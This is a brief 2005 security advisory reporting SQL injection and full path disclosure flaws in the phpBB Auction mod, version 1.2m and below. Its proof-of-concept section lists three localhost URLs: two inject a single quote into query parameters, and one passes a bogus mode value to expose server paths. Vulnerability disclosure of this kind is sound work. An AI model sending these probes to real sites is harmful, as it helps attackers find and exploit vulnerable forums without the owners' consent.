sNKenjoi's Security Advisory: [ZH2005-12SA] SQL Injection & Full Path
Disclosure in phpBB Auction


Security Advisory: SQL Injection & Full Path Disclosure  in phpBB Auction
Severity: High
Title: SQL Injection & Full Path Disclosure  in phpBB Auction

Versions

phpBB: Any Version
Auction Mod: Version 1.2m (and below)

Vendor:  phpBB-Auction
Vendor Website: http://www.phpbb-auction.com/

Proof of Concept Exploits: 

SQL Injection (Full Path Disclosure also works sometimes)
http://localhost/auction_rating.php?mode=view&u='
http://localhost/auction_offer.php?mode=add&ar='
Full Path Disclosure
http://localhost/auction_myauctions.php?mode=f00b4r

(For some you will have to be logged in)

snkenjoi.com & zone-h.org
snkenjoi@gmail.com

(Original URL: snkenjoi.com/secadv/secadv9.txt)